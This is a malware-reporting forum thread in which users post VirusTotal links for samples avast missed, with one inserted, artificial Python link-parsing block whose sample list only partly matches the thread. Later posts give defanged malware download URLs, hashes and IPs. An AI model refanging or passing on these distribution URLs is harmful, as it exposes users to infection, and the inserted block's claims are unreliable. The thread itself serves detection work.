http://www.virustotal.com/file-scan/report.html?id=30cf11bbb0320aadc50970c665a6dc28cc467917754265953ca033940b3338dc-1291889504
http://www.virustotal.com/file-scan/report.html?id=be3232ca3a7da061cba23e01ded366e29d778e4be155ad215179216c1cf1aecb-1291846308
http://www.virustotal.com/file-scan/report.html?id=25deec03dbfde34cb8c81c29edd126d96de82c781192245e9fd8f7aa2b8e6a05-1291915067
http://www.virustotal.com/file-scan/report.html?id=60bb23427e5848e7a361ada4e1ea44e7424a682d3d8c9d9c4f969bedb7cce4ae-1291912948
http://www.virustotal.com/file-scan/report.html?id=011837a42ae3ba6d56a2d8234a6c6d3723edb4e21fc66b1dab6472db8a5bdd8b-1291738956
http://www.virustotal.com/file-scan/report.html?id=c9f2d7076ef1d0bf794ed0d81bf694be7896cd60a44e61956e8d73a7cf11c7ba-1291912073
http://www.virustotal.com/file-scan/report.html?id=fcd07d46066bc332ec20f5514676f12e225f1ad08dee02c337cec960d30c9627-1291892540
-
nsm0220, are you submitting the samples to avast? (as it is mentioned in the first post of this thread)
-
yes
-
http://www.virustotal.com/file-scan/report.html?id=bec5e19f8784b9dd3f3c967b719950e9844c8dca9abf63c1dfabcec9f7f1bb21-1291929166
http://www.virustotal.com/file-scan/report.html?id=0b730cf2d3ff796a6bee6b31c291d9be582c28c9019de644a7d93f93f9e1d10f-1291934170
http://www.virustotal.com/file-scan/report.html?id=a8471195ded6bd0b325b0a8bdb99c82eed4bcafd9f4f6a006ae6ddb8eb6cee61-1291933796
http://www.virustotal.com/file-scan/report.html?id=ab96a70952980f010fea7f94221438851967c3e76d42f87bc5dd8683df325e1c-1291935563
http://www.virustotal.com/file-scan/report.html?id=2e565265aa5fa03f1b474ea5565f5917f07441f2dfeec1c72013861f90d37be2-1292148821
-
Trojan Dropper.
http://www.virustotal.com/file-scan/report.html?id=ab96a70952980f010fea7f94221438851967c3e76d42f87bc5dd8683df325e1c-1291957628
-
Not sure about this one.
0/43 on Virus Total:
http://www.virustotal.com/file-scan/report.html?id=5acddc9ce62ea190fe49abe84776a510412cb7c8c673cc59d2faf7ab16a7c2a5-1291960393
Uploaded it to VIPRE's sandbox and it sure looks like malware.
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=12070000&cs=0D04575BCE6EB3F61FB854915A1F44E3
MBAM finds it as Spyware.Passwords.XGen
-
Trojan.Scar. (MBAM)
http://www.virustotal.com/file-scan/report.html?id=4b505e12465fb5b4b554777a11af3dddb7cfcd9a493a76a9320baf85ede6463e-1292049114
Rogue A/V
http://www.virustotal.com/file-scan/report.html?id=703e9ef96679bc6e6fed691124404354f179dbead89cb2a4896ca4a2ec882079-1292050599
-
??? Is it a Trojan or a botnet?
http://www.virustotal.com/file-scan/report.html?id=182119cb8d3e207b91503b5a8bc017c8cf9d2212e83d150ae565c8a06f8092f9-1292060165
-
http://www.virustotal.com/file-scan/report.html?id=a8e30a4da9360ec5350668beaf5e987d7ca60b0c7a68a4814daca11d62a4c99e-1292239430
http://www.virustotal.com/file-scan/report.html?id=b65bee8cd4630c7012823608e9edb43ae058742ab8c09c1a2c69aaf05fd4a697-1289835235
-
Rogue Antivirus.
http://www.virustotal.com/file-scan/report.html?id=15ef8b684b98e5d1f4cf966418e17e5e78f1ff4922c29e06cfd31f1bf0814e57-1292309253
Trojan.
http://www.virustotal.com/file-scan/report.html?id=25061e5c53335d11fd193121765c284406dc02a328e5d4a5f0e5ebe2a73c8a35-1292311973
Rogue Antivirus. Same name as above, but different MD5.
http://www.virustotal.com/file-scan/report.html?id=09af306edfe77eebba501fea6bc78edaff36844c333c3ec0af34270c572ffac2-1292394619
-
Everyone can make a keylogger with that program, similar to Ardamax.
http://www.virustotal.com/file-scan/report.html?id=4e413e6c5038348be3be70c5959baf579c91e2303eeadf42a1bbf8b020390d86-1292444613
thanks.
-
Worm.Win32.AutoRun.bnex
http://www.virustotal.com/file-scan/report.html?id=477104941154d0d3673365a7f59173743ec903be6b3dbf9cfebf959898a6bff4-1292359804
-
http://www.virustotal.com/file-scan/report.html?id=392070435000ec3c62cb705beebc964b84172d924af63c1d8cfc20eb2ffb0d25-1292349952
http://www.virustotal.com/file-scan/report.html?id=0299df68b2577a9171f8af95a8d62be69e5524d649822d5792e0b0d418f5c155-1292349980
-
http://www.virustotal.com/file-scan/report.html?id=aaee85f33c79f5457a7458a42cbd182de96d7b091f541547e09fa01c23b487dc-1292355698
-
TR/Crypt.XPACK.Gen. (Antivir)
http://www.virustotal.com/file-scan/report.html?id=378840167bc5675cce79371d8bbeffbf786e4367c50962a554dd06d41f6b21c1-1292563149
Trojan Zbot.
http://www.virustotal.com/file-scan/report.html?id=c854f743769e79d886107c9b5e02e306a51a065006c233374c819716f76f658e-1292568029
Rogue Antivirus.
http://www.virustotal.com/file-scan/report.html?id=01d2504452de747f7383b85a71b06fedce3b1bca32f0837d630cb3eb414bbd50-1292570480
-
Posting just for fun......not often i see a 100% score ;)
http://www.virustotal.com/file-scan/report.html?id=b6a17d16ee7db1bff201999f79f769fe7e4a6eacc5387437d8a5973457768961-1292540577
-
Posting just for fun......not often i see a 100% score ;)
http://www.virustotal.com/file-scan/report.html?id=b6a17d16ee7db1bff201999f79f769fe7e4a6eacc5387437d8a5973457768961-1292540577
I have a doubt of it ;D
-
Trojan-Ransom.
http://www.virustotal.com/file-scan/report.html?id=557f1bf993b4ddcff09a263ee8b72db52c903d207e5b0494ca7e3237e444f316-1292652859
Rogue Antivirus.
http://www.virustotal.com/file-scan/report.html?id=e9abf75ff9f28456d14f2e3e352b7c2048b33662a445c51d34b1f2990c8b1b48-1292655998
-
malware
http://www.virustotal.com/file-scan/report.html?id=fab272012d934f75915cd888f213e8857c390086363351eab3bf69f19ce67b65-1292708012
-
Rogue Antivirus.
http://www.virustotal.com/file-scan/report.html?id=7b6fe074ed8dcd8c4c4bb91447fb9fe721b4f867ec2eb19e591f6d15190d3ea3-1292825607
-
Trojan-Kazy Variant
Detected by Avast 5 but not 4.8.
http://www.virustotal.com/file-scan/report.html?id=2039251b594b50c65ce0a892df96e922959985b730875e9f244d51e3d83e32d1-1292830545
-
Trojan-Rogue Antivirus
http://www.virustotal.com/file-scan/report.html?id=cb45bb18b26dd2ab0fb63edb3e9cb516f1e65816fcbdf08274bb3168db399bae-1292909155
-
a variant of Win32/Injector.DYK
http://www.virustotal.com/file-scan/report.html?id=f0231cdd2c015de8b22974adf8c67977713749b9eec1e97dafe8450bb6e8f7de-1292905135
-
Win32/Spy.Banker.VCV
http://www.virustotal.com/file-scan/report.html?id=5be3687550fd58a96a483758232a18c1eed9220b73ccd168e7eec79adb088ccc-1292891741
-
Rogue Antivirus.
http://www.virustotal.com/file-scan/report.html?id=7b572d3a5695ec2df843a0fd4311cea65073895dd38de1296e85f4ac301bae45-1292992359
Trojan.Downloader.
http://www.virustotal.com/file-scan/report.html?id=2c89bf28901906e0878880ae507a2c68146d2ebc1028f91ec9285407fc92dfee-1292998812
-
Everyone can make a keylogger with that program, similar to Ardamax.
http://www.virustotal.com/file-scan/report.html?id=4e413e6c5038348be3be70c5959baf579c91e2303eeadf42a1bbf8b020390d86-1292444613
thanks.
still undetected?
-
Everyone can make a keylogger with that program, similar to Ardamax.
http://www.virustotal.com/file-scan/report.html?id=4e413e6c5038348be3be70c5959baf579c91e2303eeadf42a1bbf8b020390d86-1292444613
thanks.
still undetected?
Still have the program?
If yes, just send it again to VirusTotal... but at first look to the report on the quote seems a clean file.
-
Everyone can make a keylogger with that program, similar to Ardamax.
http://www.virustotal.com/file-scan/report.html?id=4e413e6c5038348be3be70c5959baf579c91e2303eeadf42a1bbf8b020390d86-1292444613
thanks.
still undetected?
Still have the program?
If yes, just send it again to VirusTotal... but at first look to the report on the quote seems a clean file.
I've already sent it. I said similar to Ardamax. It's 100% malware.
-
Rogue Antivirus.
http://www.virustotal.com/file-scan/report.html?id=7a34a2ee512dd374946c1f9cd2bcc0d173715ca258f8f9eab417b84cfd24158d-1293080954
Same name as I reported above, different MD5.
-
http://www.virustotal.com/file-scan/report.html?id=95fafaebced50b0fc4e3e14a197494ccaf73642ca1539c91e201e5c91863f9e1-1293136846
-
http://www.virustotal.com/file-scan/report.html?id=95fafaebced50b0fc4e3e14a197494ccaf73642ca1539c91e201e5c91863f9e1-1293136846
This file was on my computer and avast did not detect it.
-
Did you send it to avast so that it could be detected??
-
Trojan Spyeye.
http://www.virustotal.com/file-scan/report.html?id=c0dec0a55b9270a331ac2dfc633c86175fd69b921a98d0d963a1397cbf15b5be-1293173674
Rootkit.
http://www.virustotal.com/file-scan/report.html?id=b70dd7caca08c9856d20e42962f388bc38d944a5803dc29dad3e301f77876e44-1293175215
-
Trojan downloader
http://www.virustotal.com/file-scan/report.html?id=a969f4f2bf5bc546659006f33b864933afd29064c88dc0987cb8f2b1d39dfba5-1284674539
Zbot / spyeye
http://www.virustotal.com/file-scan/report.html?id=fe8bfbea04126f2b26dda84cc4eeec3c4ac25435a1c8fd61854a8fb401d7d1c3-1287393580
-
Zbot / spyeye
http://www.virustotal.com/file-scan/report.html?id=fe8bfbea04126f2b26dda84cc4eeec3c4ac25435a1c8fd61854a8fb401d7d1c3-1287393580
Look here...
http://www.virustotal.com/file-scan/report.html?id=fe8bfbea04126f2b26dda84cc4eeec3c4ac25435a1c8fd61854a8fb401d7d1c3-1292058011
-
Zbot / spyeye
http://www.virustotal.com/file-scan/report.html?id=fe8bfbea04126f2b26dda84cc4eeec3c4ac25435a1c8fd61854a8fb401d7d1c3-1287393580
Look here...
http://www.virustotal.com/file-scan/report.html?id=fe8bfbea04126f2b26dda84cc4eeec3c4ac25435a1c8fd61854a8fb401d7d1c3-1292058011
eh, more up-to-date report mmm.
but this one:
http://www.virustotal.com/file-scan/report.html?id=da1c2b3807bfca9b29949442400bc8a68cac6a161feb49b648c729951ec629d6-1289874490
isn't detected by avast
-
Backdoor Trojan.
http://www.virustotal.com/file-scan/report.html?id=6f5e7a2092f6b4029c33e3df7ad5b34b165e47479c169f8ff8d6e41e67c08975-1293257481
Rogue Antivirus.
This is the third one with this name but different MD5.
http://www.virustotal.com/file-scan/report.html?id=cd8e3f8e48d829060a2e9ab1fb972272d631fd23f0d8526da0fa2993d08b7f5c-1293259721
Trojan Downloader.
http://www.virustotal.com/file-scan/report.html?id=48084612a4d111afceb5a557ea24dfd38a13bc27456f0b801953e7408f0258fe-1293262839
-
http://www.virustotal.com/file-scan/report.html?id=a76d913efcc776271b7ee7d233c49c6a3e107446b76cd8053814a869d6493614-1293259993
-
Trojan.
http://www.virustotal.com/file-scan/report.html?id=cf51f9c7bdfeff5e16ea92f8a9b24d5334208bd13ec69125e8b5b5a77b65bf07-1293338516
Trojan Dropper.
http://www.virustotal.com/file-scan/report.html?id=633b8d6a2125dd681fcc6e3b56e949edebb363f698d295cc8b1fda6677d51e26-1293340246
-
Trojan-Dropper.
http://www.virustotal.com/file-scan/report.html?id=9821eafcb0ca3984246cd0db26189f261516965751a1cb21f4b0950251423a93-1293426657
-
Trojan-GameThief.
http://www.virustotal.com/file-scan/report.html?id=e79a3a7ae2d2d9f171114c8eb31244e9125fca1841b9bd2378dce5773febbcee-1293600036
Trojan-Meredrop.
http://www.virustotal.com/file-scan/report.html?id=481eff7966fec5cde2da2558de947e8a3f7cdb4ea464feef732a40494c669113-1293602730
-
http://www.virustotal.com/file-scan/report.html?id=980048a34aeb00eb166c1002e655b5abc1a3f78172c761a6338fe43112d8b7f4-1293711830
Palevo?
-
Trojan.Zbot
http://www.virustotal.com/file-scan/report.html?id=fb68af03c0b0dc28c7b8541bacc0d5bba1988830620be01a201c5d0fb740314f-1293866103
-
Trojan-Downloader.
http://www.virustotal.com/file-scan/report.html?id=d9653d13d89bcc5ab915d53569c80eb6df2184662a62231c43febfbd28267d93-1293942862
Trojan Downloader #2
http://www.virustotal.com/file-scan/report.html?id=bd6065b3a2d2be4c4c09932c56dc5f3d8d03043d8beb03aff609c2a0d027b228-1293948578
-
Thanks Marc for helping improve detection.
Where are you getting that many samples? (you can PM me if you want) ;)
-
Sent you a PM.
-
Sent you a PM.
Thanks. Me too, with a third honeypot link.
-
Trojan.KillAV
http://www.virustotal.com/file-scan/report.html?id=23f5c8525b56f0fc94ff6acca872d6789352468619d4d4ade4989f2138911a23-1294030811
-
Trojan-Ransom.
http://www.virustotal.com/file-scan/report.html?id=6484329b4044f19355263bcbce4830fc93a125aa67f8445eae1459561fd866af-1294122041
-
FakeAV
http://www.virustotal.com/file-scan/report.html?id=f5b3b8959908d2de29ff34222b7ec7ae51e1f7c0634f6028f26c17250aa0c954-1294252989
-
http://www.virustotal.com/file-scan/report.html?id=2bf94a1599e80d51a2d9c9dca0caf48e96b17516dfe4408faa59128f3fa45775-1294415684
http://www.virustotal.com/file-scan/report.html?id=7afcf69d42a053208c0262569e81a7cad403eca066358f67e87717682a05a38c-1294417539
-
Rogue
http://www.virustotal.com/file-scan/report.html?id=bee575ab0030b49d32c268d85ada5534143d2894a9e5a928456fc5551a666d14-1294476920
-
http://www.virustotal.com/file-scan/report.html?id=9a062a3511623c42dc8e76c400f9b12fc3e57067a8073329cc1cef9d1d4886eb-1294435119
http://www.virustotal.com/file-scan/report.html?id=e06864809154e423b95acb73e39fb8959850c5e1a57f06594284085156fbdaab-1294440627
These samples are detected now.
-
http://www.virustotal.com/file-scan/report.html?id=1a524958890c08f3f2580d1a0d4bc62fc21ba5e90affd94575dad80bcaffc617-1294729202
-
http://www.virustotal.com/file-scan/report.html?id=89ab49432bc7d004da63eef88380594cb52a8918e493142213a033d08345d622-1294936404
-
http://www.virustotal.com/file-scan/report.html?id=b40e831b843bc7efb7baea32cc6451399c830901b9feab16c38762dd84423567-1294993303
-
http://www.virustotal.com/file-scan/report.html?id=36de61175198135ac1d6cb8a7e58e34b788ab7b7fdea6817b78f75ff5c0bd4b1-1294998458
Sent to Avast! / 13.01.11 / 08:01 h.
Sent with two other threats; those were added and this one wasn't!
Why?
-
http://www.virustotal.com/file-scan/report.html?id=abe490ee1505982ea8b8cb680750bb0a17da0466942364287f6fc9df09559f8c-1295079421
http://www.virustotal.com/file-scan/report.html?id=e9771228be35876e8881db3cc515d4a84d271e525039fbebd3b7cf907c41b4f3-1295080564
http://www.virustotal.com/file-scan/report.html?id=b860908a0ce8e12db727691e418fb011feb3d925a9f96d09e0db9e3739b41593-1295081247
http://www.virustotal.com/file-scan/report.html?id=90f4d26a39c65d545ee8f048af9e21f08b0053a084c86f836cff89e362ac65c2-1295081684
http://www.virustotal.com/file-scan/report.html?id=4c25f1cd0a7e65f2dba1c32d99c8d0d5efdee7bc13f8d486c2983c71891647e0-1295082318
http://www.virustotal.com/file-scan/report.html?id=1aaa29e20cda6fc418f5c14f62d1703e882e9b9110b0b0b1a9c5c1cbc80253b4-1295083603
-
Autorun-Trojan
http://www.virustotal.com/file-scan/report.html?id=de2303914426964bcba26dc6d350d625b27665720f69d99c2001b71aee674142-1294996708
-
http://www.virustotal.com/file-scan/report.html?id=84b68fd5e08236f8dc1814542c1b288e9be2067e7d9d1445c22df5d2841c20ec-1295116584
-
http://www.virustotal.com/file-scan/report.html?id=7085183d7e8073b2d7419ed2d3bebae103e7cb3e8ae2edacc6f4f62fde7efa26-1295130264
http://xylibox.blogspot.com/2011/01/fake-kaspersky-site-host-ransomware.html
Sent to Avast
-
http://www.virustotal.com/file-scan/report.html?id=7085183d7e8073b2d7419ed2d3bebae103e7cb3e8ae2edacc6f4f62fde7efa26-1295130264
http://xylibox.blogspot.com/2011/01/fake-kaspersky-site-host-ransomware.html
Sent to Avast
Can you change http to hxxp? Thank you.
Bye, kind regards ;)
-
Can you change http to hxxp? Thank you.
Eh, what? Those links aren't malicious.
-
Can you change http to hxxp? Thank you.
Eh, what? Those links aren't malicious.
+1
-
http://www.virustotal.com/file-scan/report.html?id=7085183d7e8073b2d7419ed2d3bebae103e7cb3e8ae2edacc6f4f62fde7efa26-1295279942
The threat was not added (
-
http://www.virustotal.com/file-scan/report.html?id=887bef6ec0076adedfca1923f3bc1dacef310b2f788f17de12cc3c400e04313e-1295645413
Please check this sample
-
KoenG, do you have that sample? Did you submit it to avast team?
Sure it is infected...
-
Also, check this
http://www.virustotal.com/file-scan/report.html?id=a32eccc3279782c89e491a3840a0cc9a269d88183514b9cd21f911c9062e2018-1278522524
http://www.virustotal.com/file-scan/report.html?id=1df1026a0aaa32d58514cd6bb75acd4e4275310144b980f2d2506f0f07f328fc-1295703326
-
The problem I have with this thread is that there is no follow up from anyone that is posting the links to Virustotal...
All it takes is for the person submitting the file to add it to the chest and scan it every couple of days, and when it is detected, simply edit the relevant post to say that it is now detected. Otherwise IMHO there is no point in just posting the links...
This is what I do if there is a sample that I have to submit (good or bad) leave a copy in the chest, and then scan it every couple of days, once it is detected/removed from detection then the file can go.
You can even add comments via the chest so that you can keep track of the file itself...
-
The problem I have with this thread is that there is no follow up from anyone that is posting the links to Virustotal...
They already posted they won't "follow" this thread... They would analyze the samples sent to them.
This is what I do if there is a sample that I have to submit (good or bad) leave a copy in the chest, and then scan it every couple of days, once it is detected/removed from detection then the file can go.
It would be a good thing to have a follow-up from the user, yes.
-
The problem I have with this thread is that there is no follow up from anyone that is posting the links to Virustotal...
They already posted they won't "follow" this thread... They would analyze the samples sent to them.
Sorry, I didn't mean avast team, I meant those that post the links...
For instance, Marc57's post (http://forum.avast.com/index.php?topic=64122.msg577568#msg577568) (nothing against him, just an example of what I meant) according to VT, there is another report which shows avast! detects it. All it needs is for the user to edit, and say it is now detected. Otherwise we just have a bunch of useless links...
-
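An added example, not code from any poster in this thread nor from avast or VirusTotal: a small Python helper for the follow-up problem raised above. The old-style VirusTotal links pasted here carry the sample hash and the scan time in the `id` parameter (`<sha256>-<unix timestamp>` for file-scan reports, `<md5>-<unix timestamp>` for url-scan reports; `latest-report.html?resource=` carries only a hash). Parsing that out collapses a link dump by sample and shows which links are superseded by a newer report of the same file, so a poster can check for the "more up-to-date report" before re-posting. The function names are mine; the sample list is copied from links in this thread.

```python
"""Triage helper for VirusTotal report links pasted in a forum thread.

Added example; not from any poster, nor from avast or VirusTotal. Assumes the
old-style report URL format observed in this thread:
  file-scan/report.html?id=<sha256>-<unix timestamp>
  url-scan/report.html?id=<md5>-<unix timestamp>
  latest-report.html?resource=<md5|sha1|sha256>
"""
import re
from datetime import datetime, timezone
from urllib.parse import parse_qs, urlparse

# <hex hash>-<unix seconds>: 64 hex = SHA-256 (file-scan), 32 hex = MD5 (url-scan)
_ID_RE = re.compile(r"^(?P<h>[0-9a-f]{64}|[0-9a-f]{32})-(?P<ts>\d{9,10})$", re.I)
_HASH_LEN = {32: "md5", 40: "sha1", 64: "sha256"}


def parse_vt_link(url):
    """Return {'kind', 'hash', 'hash_type', 'timestamp'} for a VT report link, else None."""
    u = urlparse(url.strip())
    if u.netloc.lower() not in ("www.virustotal.com", "virustotal.com"):
        return None
    path, q = u.path.lower(), parse_qs(u.query)
    if path.endswith("/file-scan/report.html") or path.endswith("/url-scan/report.html"):
        m = _ID_RE.match(q.get("id", [""])[0])
        if not m:
            return None
        h = m.group("h").lower()
        return {"kind": "file" if "/file-scan/" in path else "url", "hash": h,
                "hash_type": _HASH_LEN[len(h)], "timestamp": int(m.group("ts"))}
    if path.endswith("/latest-report.html"):
        h = q.get("resource", [""])[0].lower()
        if len(h) not in _HASH_LEN or not re.fullmatch(r"[0-9a-f]+", h):
            return None
        return {"kind": "latest", "hash": h, "hash_type": _HASH_LEN[len(h)], "timestamp": None}
    return None


def summarize(urls):
    """Group report links by hash; track the newest report and the links it supersedes."""
    summary = {}
    for url in urls:
        p = parse_vt_link(url)
        if p is None:
            continue  # not a VT report link (Jotti, sandbox reports, prose)
        e = summary.setdefault(p["hash"], {"hash_type": p["hash_type"], "links": 0,
                                            "latest_ts": None, "latest_url": None,
                                            "superseded": [], "duplicates": []})
        e["links"] += 1
        ts = p["timestamp"]
        if ts is None:
            continue  # latest-report links have no scan time to compare
        if e["latest_ts"] is None or ts > e["latest_ts"]:
            if e["latest_url"] is not None:
                e["superseded"].append(e["latest_url"])
            e["latest_ts"], e["latest_url"] = ts, url
        elif ts == e["latest_ts"]:
            e["duplicates"].append(url)  # same report pasted twice
        else:
            e["superseded"].append(url)  # older report; a newer one is already in the list
    return summary


def stale_links(urls):
    """Links for which the same list already holds a newer report of the same hash."""
    return [u for e in summarize(urls).values() for u in e["superseded"]]


def report_date(ts):
    """Unix scan timestamp -> ISO date (UTC); the ids in this thread decode to late 2010/early 2011."""
    return datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d")


# Links copied from this thread: three files were each posted several times over weeks.
SAMPLE_LINKS = [
    "http://www.virustotal.com/file-scan/report.html?id=6de1250a22772eb6417e3e896961a3cc6e227b5eb781172d61ca8145c4018b7a-1291848520",
    "http://www.virustotal.com/file-scan/report.html?id=6de1250a22772eb6417e3e896961a3cc6e227b5eb781172d61ca8145c4018b7a-1291848520",
    "http://www.virustotal.com/file-scan/report.html?id=fab272012d934f75915cd888f213e8857c390086363351eab3bf69f19ce67b65-1291830602",
    "http://www.virustotal.com/file-scan/report.html?id=a8e30a4da9360ec5350668beaf5e987d7ca60b0c7a68a4814daca11d62a4c99e-1291139455",
    "http://www.virustotal.com/file-scan/report.html?id=fab272012d934f75915cd888f213e8857c390086363351eab3bf69f19ce67b65-1292708012",
    "http://www.virustotal.com/file-scan/report.html?id=a8e30a4da9360ec5350668beaf5e987d7ca60b0c7a68a4814daca11d62a4c99e-1292239430",
    "http://www.virustotal.com/file-scan/report.html?id=a8e30a4da9360ec5350668beaf5e987d7ca60b0c7a68a4814daca11d62a4c99e-1294314942",
    "http://www.virustotal.com/file-scan/report.html?id=6de1250a22772eb6417e3e896961a3cc6e227b5eb781172d61ca8145c4018b7a-1296086845",
    "http://www.virustotal.com/file-scan/report.html?id=fab272012d934f75915cd888f213e8857c390086363351eab3bf69f19ce67b65-1296108950",
    "http://www.virustotal.com/url-scan/report.html?id=66c68e7cdb39871cf218bf320f42686b-1288938948",
    "http://www.virustotal.com/latest-report.html?resource=f920958410f6ebaddfc9a1a4d66db082",
    "http://virusscan.jotti.org/en/scanresult/397d3a1752993f12d11499c860944b2fa3b923c5",
]

if __name__ == "__main__":
    for h, e in summarize(SAMPLE_LINKS).items():
        when = report_date(e["latest_ts"]) if e["latest_ts"] else "n/a"
        print(f"{h[:12]}.. {e['hash_type']:6} links={e['links']} latest={when} "
              f"superseded={len(e['superseded'])} dup={len(e['duplicates'])}")
```

Run it as-is to get one line per hash; feed it a whole thread's links and the `superseded` entries are exactly the posts that should be edited to point at the newer report. The script only reads the ids, so it never touches VirusTotal or any sample.
-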
KoenG, do you have that sample? Did you submit it to avast team?
Sure it is infected...
No Tech, I don't have this sample. I copied/pasted a VT report from the VT site to the Avast forum.
The problem I have with this thread is that there is no follow up from anyone that is posting the links to Virustotal...
All it takes is for the person submitting the file to add it to the chest and scan it every couple of days, and when it is detected, simply edit the relevant post to say that it is now detected. Otherwise IMHO there is no point in just posting the links...
This is what I do if there is a sample that I have to submit (good or bad) leave a copy in the chest, and then scan it every couple of days, once it is detected/removed from detection then the file can go.
You can even add comments via the chest so that you can keep track of the file itself...
And sorry, but is there no follow-up when a VT link is posted on the avast forum?
Sorry for my bad English and for possible misunderstandings.
And can everyone now get back on topic, please?
-
nice list
-
http://www.virustotal.com/file-scan/report.html?id=6de1250a22772eb6417e3e896961a3cc6e227b5eb781172d61ca8145c4018b7a-1296086845
-
http://www.virustotal.com/file-scan/report.html?id=fab272012d934f75915cd888f213e8857c390086363351eab3bf69f19ce67b65-1296108950
-
suspicious http://www.virustotal.com/file-scan/report.html?id=a8e30a4da9360ec5350668beaf5e987d7ca60b0c7a68a4814daca11d62a4c99e-1294314942
-
nice list
But a pretty pointless one as no one goes back and edits their posts when the malware sample is detected.
The links are of no use to avast, only physical samples can be analysed, so just send those to avast.
-
One more problem: I have seen real malware on VirusTotal links, but people say it's goodware just to lure other people.
-
Are you really ready to believe these anonymous people, of whose experience or intent you haven't a clue? Trust the weight of independent AV scanners rather than anonymous comments.
-
Possible Java Malware:
http://www.virustotal.com/file-scan/report.html?id=ddfa23f9459b18b258f488fe0c06d66d5b7177e0f5325e72fde365df9ca8b30e-1297551741
http://camas.comodo.com/cgi-bin/submit?file=ddfa23f9459b18b258f488fe0c06d66d5b7177e0f5325e72fde365df9ca8b30e
MD5 : f780a5b1d533e3b906ba46d16e482fd8
Spirit.exe:
http://www.virustotal.com/file-scan/report.html?id=c8561e9b17c476344caadcfef70ce47d92c6c000261c549757457f4bfb190b7d-1297550795
http://camas.comodo.com/cgi-bin/submit?file=3751c585215f0f3126f0c761d6b314fd8634572ab09a9cf803d5cdc5393ffd3d
MD5 : 2b13ffc376f749f74a105a441f4a1517
-
Rogue Antivirus.
http://www.virustotal.com/file-scan/report.html?id=b3128a468a31dbb173bd8be9b62f57a739a367a72ff5b59d282c6eb26154c4e4-1297661465
-
Rogue Antivirus.
http://www.virustotal.com/file-scan/report.html?id=7781770a95896c5fb2ea83b9861ab99427a5f4da12dd67ffcacf56bdb4c249ea-1300597180
-
Good find, Marc57,
Avast also misses out on Palevo alias G bot a bit here: http://amada.abuse.ch/?search=91.217.162.24
Click the virustotal analysis there...and see for yourself
polonus
-
Rogue AV called Clean This, clone of ThinkPoint and Palladium Pro.
https://www.virustotal.com/file-scan/report.html?id=27eb412b15445b87ee8b35e419ce6147b69b4d623d6ce66a7993a331b8a0c708-1300519352
-
suspicious
http://www.virustotal.com/file-scan/report.html?id=190c6f801c134f32cba465e78d0a02efdf183dd8892514072a0505dd61a65be0-1300646017
suspicious
http://www.virustotal.com/file-scan/report.html?id=5cce92dc7ea0ba7f93b5f92bf2897a0697926bd3240e5f54237742a4d9fe84e4-1300646440
trojan
http://www.virustotal.com/file-scan/report.html?id=ce3b536fd55af6786370727ff47ed16ec7b285c26a197de35fb769772498cabf-1300647316
hotkeyshook
Why is there detection for all the samples but not this one? (There should be HotKeysHook-I.)
http://www.virustotal.com/file-scan/report.html?id=5fdb84a878575d3440a5f5600a6532a7ccc7bd0b401e9eb33c3af9843b977097-1300647461
-
danny96, did you submit the sample to avast? See #1 post of the thread.
-
danny96, did you submit the sample to avast? See #1 post of the thread.
It's not from my PC. Just looking at some trainers on the website www.abecedaher.cz...
-
trojan h@tkeysh@@k.dll
http://www.virustotal.com/file-scan/report.html?id=0740e9df2dbb197a3b1a62be505ea2657673a5a4485815d56db7a56b9c874281-1300646150
(had this on my computer - very dangerous)
Well, avast detects it. Look at your VT link. ;)
-
trojan h@tkeysh@@k.dll
http://www.virustotal.com/file-scan/report.html?id=0740e9df2dbb197a3b1a62be505ea2657673a5a4485815d56db7a56b9c874281-1300646150
(had this on my computer - very dangerous)
Well, avast detects it. Look at your VT link. ;)
LOL, sorry. But shouldn't detection be added for Avast! 4.8?
EDIT: Added next link
-
What is this TrjKrap.AZ? Not detected here as Win32:Malware-gen by avast: http://www.virustotal.com/url-scan/report.html?id=66c68e7cdb39871cf218bf320f42686b-1288938948
see file analysis: http://www.virustotal.com/file-scan/report.html?id=a5976124178be0ff7c864f3d74d36f372422bcca404d01697e6431f29dff8f9e-1288942583
Found here:
2011-03-20 20:28:31 htxp://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9 F0E35CDBDBB2B56003EFD859720BDFC7 184.85.147.191 US TrjKrap.AZ
2011-03-20 20:28:29 htxp://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7 F749BF47AB457E7F5670BE0B55C8DFA2 184.85.147.191 US TrjKrap.AZ
See: htxp://jsunpack.jeek.org/dec/go?report=fbe72914baadd9d253939dad06b0b5ccf98a8e56
Found benign: http://wepawet.iseclab.org/view.php?hash=d2b1b6a4068971379ab528362d3ae0b2&t=1300654385&type=js
But see: http://www.pandasecurity.com/homeusers/security-info/218557/Krap.AZ/
Should be detected by avast as Win32:Malware-gen,
polonus
-
Malicious Flash_Player_10.2_update_for_Win.exe not detected by avast as Win32:Renos variant...
see: http://www.virustotal.com/url-scan/report.html?id=48cb08b5fffd3b0c69f9662e2b1d8da5-1300651632
file analysis: http://www.virustotal.com/file-scan/report.html?id=8801fb51b54dc45069154d262135e1ddd77d2142aa8cb1a70e3e56bf3222d07b-1300655236
See: http://www.sophos.com/security/analyses/viruses-and-spyware/malfakeaviz.html?_log_from=rss
Also found to be suspicious here: http://wepawet.iseclab.org/view.php?hash=48cb08b5fffd3b0c69f9662e2b1d8da5&t=1300655461&type=js
Accompanying Anubis report here: http://anubis.iseclab.org/?action=result&task_id=1e47e25cfa4212b94d5c0dbfb942b6e07
polonus
-
This parasitic virus that infects Win32 PE executable files is missed by avast, see: http://www.virustotal.com/url-scan/report.html?id=0fada3e4220ae5e9bb7e9a0f255115de-1300726070
file analysis: http://www.virustotal.com/url-scan/report.html?id=0fada3e4220ae5e9bb7e9a0f255115de-1300726070
= 2011-03-21 16:52:06 htxp://nutromchuu.co.cc/release/d2f0b5c46987429e2ad87a745a130a92/Internet-Explorer_update.exe 2D7307DCB9E615FFD1A28C3089F9CA4A 46 . 16. 240. 3 UA JSSality.AO
See: http://wepawet.iseclab.org/view.php?hash=0fada3e4220ae5e9bb7e9a0f255115de&t=1300729945&type=js (suspicious)
accompanying Anubis report to be found here: http://anubis.iseclab.org/?action=result&task_id=1cd3f576f2e1d72d4b1515c19f4c57216
see: htxp://jsunpack.jeek.org/dec/go?report=519636b9a472c69744b37908c41fe4409ab1c24c (this link only for experienced users)
polonus
-
